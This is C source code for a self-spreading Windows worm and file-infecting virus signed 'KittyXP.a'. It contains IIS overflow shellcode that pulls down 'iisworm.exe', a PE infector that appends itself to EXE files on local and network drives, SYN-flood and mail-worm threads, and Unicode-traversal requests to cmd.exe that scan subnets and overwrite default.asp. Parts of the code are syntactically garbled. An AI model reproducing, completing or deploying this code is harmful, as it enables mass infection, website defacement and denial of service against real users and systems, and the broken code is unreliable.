0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33,
0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50,
0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1,
0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75,
0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92,
0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A,
0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43,
0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D,
0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF,
0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52,
0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF,
0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF,
0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC,
0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50,
0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D,
0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93,
0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90,
0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90,
0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54,
0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84,
0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95,
0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F,
0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E,
0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D,
0x0A };
void attack(char *host) {
SOCKET s;
struct hostent *he;
SOCKADDR_IN sout;
int i;
s = socket(AF_INET,SOCK_STREAM,0);
he = gethostbyname(host);
if (!he) return;
sout.sin_family = AF_INET;
sout.sin_addr.s_addr = *((unsigned long *)he->h_addr_list[0]);
sout.sin_port = htons(80);
i = connect(s,(LPSOCKADDR)&sout,sizeof(sout));
if (i!=0) return;
send(s,sploit,sizeof(sploit),0);
closesocket(s);
}
void setuphostname() {
char s[1024];
struct hostent *he;
int i;
gethostname(s,1024);
he = gethostbyname(s);
strcpy(s,he->h_name);
strcat(s,"!GET /iisworm.exe");
for (i=0; i<strlen(s); i++) s[i]+=0x21;
memcpy(sploit+sizeof(sploit)-102,he->h_name,strlen(he->h_name));
}
/////////////////////
// Type definitions
/////////////////////
typedef struct
{
WORD RelocOfs : 12;
WORD RelocType:4;
} IMAGE_RELOCATION_DATA;
////////////
// Globals
////////////
IMAGE_NT_HEADERS PEHeader;
IMAGE_DOS_HEADER * IDosHeader;
IMAGE_NT_HEADERS * IPEHeader;
IMAGE_SECTION_HEADER * ISection;
IMAGE_SECTION_HEADER * Section = NULL;
int Generation = 1;
int VirusSections = 0;
int FirstVirusSection = 0;
int VirusCodeSection = 0;
int VirusImportSection = 0;
DWORD VirusImportSize = 0;
DWORD VirusRVAImports = 0;
DWORD HostRVAImports = 0;
int VirusRelocSection = 0;
DWORD VirusRelocSize = 0;
DWORD VirusRelocSizeDir = 0;
DWORD OfsSections = 0;
DWORD VirusBaseRVA = 0;
DWORD VirusEP = 0;
DWORD HostEP = 0;
//// Fix for Visual C 5.0 heap
//extern __small_block_heap;
//////////////
// Functions
//////////////
/////////////////////////////////////
// GetProcAddress for ordinal imports
/////////////////////////////////////
DWORD GetProcAddressOrd(DWORD Base, DWORD NFunc)
{
IMAGE_NT_HEADERS * DLLHeader;
IMAGE_EXPORT_DIRECTORY * Exports;
DWORD * AddrFunctions;
DLLHeader = (IMAGE_NT_HEADERS *)(Base + ((IMAGE_DOS_HEADER *)Base)->e_lfanew);
Exports = (IMAGE_EXPORT_DIRECTORY *)(Base + DLLHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
AddrFunctions = (DWORD *)(Base + Exports->AddressOfFunctions);
return Base + AddrFunctions[NFunc - Exports->Base];
}
//////////////////////////////////
// Check file and read PE header
//////////////////////////////////
int ReadPEHeader(HANDLE FHandle)//FILE * FHandle)
{
IMAGE_DOS_HEADER FileHeader;
WORD SizeSections;
DWORD BytesRead;
return
(// Read file header
( ReadFile(FHandle, &FileHeader, sizeof(IMAGE_DOS_HEADER), &BytesRead, NULL) )
&&
( BytesRead == sizeof(IMAGE_DOS_HEADER) )
&& // Check if EXE file
( FileHeader.e_magic == IMAGE_DOS_SIGNATURE )
&& // Seek to NewExe header
( SetFilePointer(FHandle, FileHeader.e_lfanew, NULL, FILE_BEGIN) != (DWORD)-1 )
&& // Read header
( ReadFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL) )
&&
( BytesRead == sizeof(IMAGE_NT_HEADERS) )
&& // Check if PE file
( PEHeader.Signature == IMAGE_NT_SIGNATURE )
&& // Alloc memory for file sections + virus sections
( (SizeSections = (PEHeader.FileHeader.NumberOfSections + VirusSections) * sizeof(IMAGE_SECTION_HEADER)) )
&&
( (Section = MEMALLOC(SizeSections)) != NULL )
&&
( (OfsSections = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT)) )
&& // Read PE sections
( ReadFile(FHandle, Section, SizeSections, &BytesRead, NULL) )
&&
( BytesRead == SizeSections )
&& // Check if there is enough room for our sections
( (SetFilePointer(FHandle, 0, NULL, FILE_CURRENT) + (VirusSections * sizeof(IMAGE_SECTION_HEADER))) <= PEHeader.OptionalHeader.SizeOfHeaders )
&& // Only infect when entry point belongs to 1st section
// Avoid reinfections and compressors (usually perform virus checks)
( PEHeader.OptionalHeader.AddressOfEntryPoint < Section[0].VirtualAddress + Section[0].SizeOfRawData )
&& // Skip DDLs
( !(PEHeader.FileHeader.Characteristics & IMAGE_FILE_DLL) )
&& // Skip files with overlays or not aligned to file alignment
( SetFilePointer(FHandle, 0, NULL, FILE_END) == Section[PEHeader.FileHeader.NumberOfSections-1].PointerToRawData + Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
&& //Check if the host will overwrite our code with its unitialized data (not present in disk)
( Section[PEHeader.FileHeader.NumberOfSections-1].Misc.VirtualSize <= Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
);
}
///////////////////////////////////////
// Translates a RVA into a file offset
///////////////////////////////////////
DWORD RVA2Ofs(DWORD rva)
{
int NSect;
NSect = 0;
while ( NSect < (PEHeader.FileHeader.NumberOfSections - 1) )
{
if ( (Section[NSect].VirtualAddress + Section[NSect].SizeOfRawData) >= rva )
break;
NSect++;
}
return (Section[NSect].PointerToRawData + ( rva - Section[NSect].VirtualAddress ));
}
////////////////////////////////////////////
// I can't remember what this function does
////////////////////////////////////////////
void InfectFile(HANDLE FHandle)
{
BYTE * Relocations = NULL;
BYTE * HostRelocs = NULL;
BYTE * Ptr;
IMAGE_BASE_RELOCATION * RelocBlock;
IMAGE_RELOCATION_DATA * PtrReloc;
int j;
// Let's do some initializations
Section = NULL;
Relocations = NULL;
HostRelocs = NULL;
Ptr = NULL;
if (ReadPEHeader(FHandle))
{
DWORD SectionRVA;
int HostNSections;
DWORD HostRelocsSize;
DWORD BytesRead;
int i;
HostEP = PEHeader.OptionalHeader.AddressOfEntryPoint;
HostNSections = PEHeader.FileHeader.NumberOfSections;
HostRVAImports = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
// Search for victim import section
for (i=0; i<HostNSections; i++)
{
if (Section[i].VirtualAddress + Section[i].SizeOfRawData > HostRVAImports)
{
// Do it writable
Section[i].Characteristics |= IMAGE_SCN_MEM_WRITE;
break;
}
}
// Check if last section is .reloc
HostRelocsSize = 0;
if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress == Section[HostNSections-1].VirtualAddress)
{
// Then we'll join it to virus reloc section
VirusBaseRVA = SectionRVA = Section[HostNSections-1].VirtualAddress;
if ( (HostRelocs = (BYTE *)MEMALLOC((HostRelocsSize = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size))) == NULL)
{
goto L_Exit_Infect;
}
else// Read the .reloc section
{
HostNSections--;
SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
ReadFile(FHandle,HostRelocs, HostRelocsSize, &BytesRead, NULL);
SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
}
}
else// There is no .reloc or it is not the last section
{
if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
{ // There are relocs but we didn't find them, so exit
goto L_Exit_Infect;
}
VirusBaseRVA = SectionRVA = PEHeader.OptionalHeader.SizeOfImage;
SetFilePointer(FHandle, 0, NULL, FILE_END);
}
FirstVirusSection = HostNSections;
// Add virus section table
CopyMemory(&Section[HostNSections], &ISection[0], sizeof(IMAGE_SECTION_HEADER) * VirusSections);
// Reloc virus code & fix reloc sections
if ((Relocations = MEMALLOC((VirusRelocSize > 0x1000)? VirusRelocSize : 0x1000)) == NULL) // Minimun a page
{
goto L_Exit_Infect;
}
CopyMemory(Relocations, (BYTE *)((DWORD)IDosHeader + ISection[VirusRelocSection].VirtualAddress + ISection[VirusRelocSection].Misc.VirtualSize - VirusRelocSize), VirusRelocSize);
RelocBlock = (IMAGE_BASE_RELOCATION *)Relocations;
PtrReloc = (IMAGE_RELOCATION_DATA *)(Relocations + sizeof(IMAGE_BASE_RELOCATION));
// Reloc all virus sections and write them to disk
for (i=0; i<VirusSections; i++)
{
DWORD RelocsInBlock;
Section[HostNSections + i].PointerToRawData = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT);
Section[HostNSections + i].VirtualAddress = SectionRVA;
Section[HostNSections + i].SizeOfRawData = (ISection[i].SizeOfRawData + PEHeader.OptionalHeader.FileAlignment-1) & (-(long)PEHeader.OptionalHeader.FileAlignment);
if (i == VirusRelocSection)// Virus reloc section?
{
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = SectionRVA;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = HostRelocsSize + VirusRelocSize;
Section[HostNSections + i].Misc.VirtualSize = HostRelocsSize + VirusRelocSize;
Section[HostNSections + i].SizeOfRawData = (HostRelocsSize + VirusRelocSize + (PEHeader.OptionalHeader.FileAlignment - 1)) & (-(long)PEHeader.OptionalHeader.FileAlignment);
// Write host relocations
WriteFile(FHandle, HostRelocs, HostRelocsSize, &BytesRead, NULL);
// Add virus relocations
WriteFile(FHandle, Relocations, VirusRelocSize, &BytesRead, NULL);
// Fill with zeros until file alignment
memset(Relocations, 0, 0x1000);
WriteFile(FHandle, Relocations, Section[HostNSections + i].SizeOfRawData - (HostRelocsSize + VirusRelocSize), &BytesRead, NULL);
}
else
{
if ((Ptr = (BYTE *)MEMALLOC(ISection[i].SizeOfRawData)) == NULL)
{
goto L_Exit_Infect;
}
CopyMemory(Ptr, (BYTE *)((DWORD)IDosHeader + ISection[i].VirtualAddress), ISection[i].SizeOfRawData);
// Patch Visual C 5.0 heap in .data section
/*
{
DWORD * PtrHeap = &__small_block_heap;
if (((DWORD)IDosHeader + ISection[i].VirtualAddress < (DWORD)PtrHeap)
&&
((DWORD)IDosHeader + ISection[i].VirtualAddress + ISection[i].SizeOfRawData > (DWORD)PtrHeap)
)
{
PtrHeap = (DWORD *)(Ptr + (DWORD)PtrHeap - (DWORD)IDosHeader - ISection[i].VirtualAddress);
PtrHeap[3] = PtrHeap[2];
PtrHeap[4] = PtrHeap[5] = (DWORD)-1;
}
}
*/
// Do relocations in this section
while ( (ISection[i].VirtualAddress + ISection[i].SizeOfRawData > RelocBlock->VirtualAddress)
&&
((DWORD)PtrReloc < (DWORD)Relocations + VirusRelocSizeDir)
)
{
DWORD Base;
Base = RelocBlock->VirtualAddress - ISection[i].VirtualAddress;
RelocsInBlock = (RelocBlock->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOCATION_DATA);
while (RelocsInBlock--)
{
if (PtrReloc->RelocType == IMAGE_REL_BASED_HIGHLOW)
{
*((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) -= (IPEHeader->OptionalHeader.ImageBase + ISection[i].VirtualAddress);//RelocBlock->VirtualAddress);
*((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) += (PEHeader.OptionalHeader.ImageBase + SectionRVA);
}
PtrReloc++;
}
RelocBlock->VirtualAddress = RelocBlock->VirtualAddress - ISection[i].VirtualAddress + SectionRVA;
RelocBlock = (IMAGE_BASE_RELOCATION *)PtrReloc;
PtrReloc = (IMAGE_RELOCATION_DATA *)((BYTE *)RelocBlock + sizeof(IMAGE_BASE_RELOCATION));
}
// Check if this is the Import section
if (i == VirusImportSection)
{
IMAGE_IMPORT_DESCRIPTOR * Imports;
IMAGE_THUNK_DATA * DataImports;
DWORD StartImports;
DWORD DeltaRVAs;
DeltaRVAs = SectionRVA - ISection[i].VirtualAddress;
StartImports = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress - ISection[i].VirtualAddress;
Imports = (IMAGE_IMPORT_DESCRIPTOR *)&Ptr[StartImports];
while (Imports->OriginalFirstThunk)
{
// Fix some initialized fields in memory
Imports->TimeDateStamp = Imports->ForwarderChain = 0;
Imports->OriginalFirstThunk += DeltaRVAs;
Imports->Name += DeltaRVAs;
Imports->FirstThunk += DeltaRVAs;
DataImports = (IMAGE_THUNK_DATA *)&Ptr[Imports->OriginalFirstThunk - SectionRVA];
do
{
DataImports->u1.AddressOfData = (IMAGE_IMPORT_BY_NAME *)((DWORD)DataImports->u1.AddressOfData + DeltaRVAs);
}
while ((++DataImports)->u1.AddressOfData);
Imports++;
}
}
WriteFile(FHandle, Ptr, Section[HostNSections + i].SizeOfRawData, &BytesRead, NULL);
MEMFREE(Ptr);
Ptr = NULL;
}
SectionRVA += ( Section[HostNSections + i].Misc.VirtualSize + (PEHeader.OptionalHeader.SectionAlignment - 1)) & (-(long)PEHeader.OptionalHeader.SectionAlignment);
}//for
// Recalculate Header fields
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size = 0;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = VirusRVAImports + Section[HostNSections + VirusCodeSection].VirtualAddress;
PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
PEHeader.OptionalHeader.SizeOfImage = SectionRVA;
PEHeader.OptionalHeader.AddressOfEntryPoint = VirusEP + Section[HostNSections + VirusCodeSection].VirtualAddress;
PEHeader.FileHeader.NumberOfSections = HostNSections + VirusSections;
PEHeader.OptionalHeader.SizeOfCode = 0;
PEHeader.OptionalHeader.SizeOfInitializedData = 0;
PEHeader.OptionalHeader.SizeOfUninitializedData = 0;
for (j=0; j<PEHeader.FileHeader.NumberOfSections; j++)
{
if (Section[j].Characteristics & IMAGE_SCN_CNT_CODE)
PEHeader.OptionalHeader.SizeOfCode += Section[j].SizeOfRawData;
if (Section[j].Characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA)
PEHeader.OptionalHeader.SizeOfInitializedData += Section[j].SizeOfRawData;
if (Section[j].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA)
PEHeader.OptionalHeader.SizeOfUninitializedData += Section[j].SizeOfRawData;
}
// Write new header and section table
SetFilePointer(FHandle, OfsSections - sizeof(IMAGE_NT_HEADERS), NULL, FILE_BEGIN);
WriteFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL);
WriteFile(FHandle, Section, PEHeader.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER), &BytesRead, NULL);
}
L_Exit_Infect:
// Free allocated memory
if (HostRelocs != NULL)
MEMFREE(HostRelocs);
if (Relocations != NULL)
MEMFREE(Relocations);
if (Section != NULL)
MEMFREE(Section);
if (Ptr != NULL)
MEMFREE(Ptr);
}
///////////////////////////////////////////
// Recursively search for files to infect
///////////////////////////////////////////
void SearchFiles(char * Path)
{
HANDLE FindHandle;
HANDLE FHandle;
WIN32_FIND_DATA FindResult;
FILETIME Time1, Time2, Time3;
if (SetCurrentDirectory(Path))
{
// Search for EXE files in current directory
if ((FindHandle = FindFirstFile("*.EXE", &FindResult)) != INVALID_HANDLE_VALUE)
{
do
{
FHandle = CreateFile(FindResult.cFileName,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_ARCHIVE,
NULL
);
if (FHandle != INVALID_HANDLE_VALUE)
{
GetFileTime(FHandle, &Time1, &Time2, &Time3); // Get file time
InfectFile(FHandle);// Infect file
SetFileTime(FHandle, &Time1, &Time2, &Time3); // Restore file time
CloseHandle(FHandle);
}
}
while (FindNextFile(FindHandle, &FindResult));
}
FindClose(FindHandle);
// Now search for subdirectories and process them
if ((FindHandle = FindFirstFile("*", &FindResult)) != INVALID_HANDLE_VALUE)
{
do
{
if (FindResult.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
char * DirName;
DirName = _strupr(_strdup(FindResult.cFileName));
if (
(memcmp(DirName, "SYSTEM", 6))// Skip SYSTEM??
&&
(FindResult.cFileName[0] != '.')// Skip loops with "." and ".."
)
{
SearchFiles(FindResult.cFileName);
}
free(DirName);
}
}
while (FindNextFile(FindHandle, &FindResult));
}
FindClose(FindHandle);
}
}
/////////////////////////////////////////////
// Search fixed and network drives to infect
/////////////////////////////////////////////
DWORD WINAPI SearchDrives()
{
DWORD Drives;
BYTE CurrentDrive[] = "A:\\";
DWORD DriveType;
BYTE i;
Drives = GetLogicalDrives();
for (i=0; i<sizeof(DWORD); i++)
{
if (Drives & (1<<i))// Drive present?
{
CurrentDrive[0] = 'A' + i;
DriveType = GetDriveType(CurrentDrive);
// Only infect files in Fixed and Network Drives
if ((DriveType == DRIVE_FIXED) || (DriveType == DRIVE_REMOTE))
{
SearchFiles(CurrentDrive);
}
}
}
return 1;
}
///////////
// Payload
///////////
int MyMessageBox(HWND hWnd, LPSTR Text, LPSTR Caption, UINT Type)
{
char * Msgs[] =
{
"我爱你张一",
"KittyXP.a by Squirrel in china",
"我爱你张一",
"我爱你张一"
};
static int i = 0;
return MessageBoxA(hWnd, Text, Msgs[++i & 3], Type);
}
// Simulated host for 1st generation
void Gen1()
{
MyMessageBox(NULL, "", NULL, MB_OK);
}
file://程序入口
int main(int argc, char *argv[])
{
HANDLE hThread=NULL;
DWORD dwThreadID;
HANDLE hThread1=NULL;
HANDLE idpthread;
DWORD dwThreadID1;
HANDLE iis4thread;
DWORD dwThreadID2;
HANDLE xpmethread;
DWORD dwThreadID3;
HANDLE anitthd;
DWORD dwThreadID4;
DWORD dwThreadID0;
handle synflood
dword synfloodid
long PreviousCount;
handle pevr
dword pevrid
handle mailworm
dword wormid
pevr=CreateThread(NULL,0,pevirus,argv,0,&pevrid)//调用病毒部分
CreateThread(NULL,0,TFTP32,0,0,&dwthreadid0)//开始tftp32
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
//CurVerInfo.dwOSVersionInfoSize = sizeof(CurVerInfo);
//GetVersionEx(&CurVerInfo);
HKEY KittyXP.aInstallKey,KittyXP.aNewKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\KittyXP.a\\Install",0,KEY_ALL_ACCESS,&KittyXP.aInstallKey)==ERROR_SUCCESS)
{
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
char systemdir[512]
GetSystemDirectory(systemdir,512)
lstrcat(systemdir,"\\ssrv.exe")
CopyFile(svFileName,systemdir,false)
mailworm=CreateThread(NULL,0,worm,argv,0,&wormid)//调用蠕虫部分
WaitForSingleObject(mailworm, INFINITE)
CloseHandle(mailworm)
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\KittyXP.a\\Install",&KittyXP.aNewKey);
RegCloseKey(KittyXP.aNewKey);
}
int i;
int StartNet;
int StopNet;
int StartHost;//IP段开始
int StopHost;//IP段结束
WSADATA wsaData;
struct in_addr host;
WSAStartup(0x202, &wsaData );
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{
host.S_un.S_addr = inet_addr(argv[1]);
WSAStartup(0x202, &wsaData );
hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{
//printf("\nCreateSemaphore failed:%d",GetLastError());
file://__leave;
}
for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
idpthread=CreateThread(NULL,0,redcode,(LPVOID)i,0,&dwThreadID1);
iis4thread=CreateThread(NULL,0,iis4,(LPVOID)i,0,&dwThreadID2);
xpmethread=CreateThread(NULL,0,xpmethd,(LPVOID)i,0,&dwThreadID3);
anitthd=CreateThread(NULL,0,anitthd,(LPVOID)i,0,&dwThreadID3);
synflood=CreateThread(NULL,0,flood,0,0,&synfloodid)
if((hThread==NULL) or (idpthread==null) or (iis4thread==null) or (xpmethread==null) or (anitthd==null) or (synflood==null))
{
//printf("\nCreate thread failed:%d",GetLastError());
break;
}
//printf(".");
Sleep(10);
CloseHandle(hThread);
CloseHandle(idpthread)
CloseHandle(xpmethread)
CloseHandle(iis4thread)
CloseHandle(anitthd)
CloseHandle(synflood)
WaitForSingleObject(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
//printf("\nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
//printf("\nAll done.");
break;
}
Sleep(500);
}
// printf("发现可执行目录. [%s]\n", exedir);
// printf("可执行目录是 [%s]\n",localpath);
CloseHandle(hSemaphore);
WSACleanup();
}
while((argc=2)or (argc>2)or (argc<2));//死循环
return 0;
}
long GetLocalIP(void)
{
charszName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
//printf("%s\n",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
//printf("%s\n",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}
DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];
char *buffer,*p;
char space[3];
char dletter[2];//磁盘路径
char asc[3];
int rbytes=0,loc1=0,loc2=0;
char locdir[300];
int exenum=0;
crack:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,"%20");
memset(asc,0,3);
strcpy(asc,"%3E");
//printf("查找漏洞%d...\n",host);
for(i=0;i<8;i++)
{
strcat(uniwaste,"..");
strcat(uniwaste,hole[num]); file://把unicode码和URL结合起来.
}
memset(waste,0,500);
file://create our string that sees if we can execute cmd.exe
file://that way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("Trying directory [%s]\n", waste);
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Directory of"); file://找到了cmd.exe的目录!!!
if(p!=NULL)
{
loc1=p-buffer+1;
p=strstr(buffer,"<DIR>");
if(p!=NULL)
{
loc2=p-buffer+1;
loc2=loc2-27;
buffer[loc2-2]='\0';
strncpy(locdir,buffer+loc1+12,290);
file://Set executable directory.
exedir=malloc(strlen(ExeDirs[exenum])+1);
memset(exedir,0,strlen(ExeDirs[exenum])+1);
memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
file://Set executable directory path
localpath=malloc(strlen(locdir)+1);
memset(localpath,0,strlen(locdir)+1);
memcpy(localpath,locdir,strlen(locdir));
closesocket(SockFD);
file://查询首页位置
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);//DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
WebPath=find(buffer,"PATH_TRANSLATED=");//上面通过cmd.exe?/c set命令显示主机配置
file://从中找到WEB目录,用来修改首页
closesocket(SockFD);
strncpy(dletter,localpath,1);
dletter[1]='\0';
//printf("首页路径%s\n",WebPath);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);//DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.asp>+%s\\default.asp HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页default.asp \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
// printf("Access is denied");
}
closesocket(SockFD);
}
memset(waste,0,500);
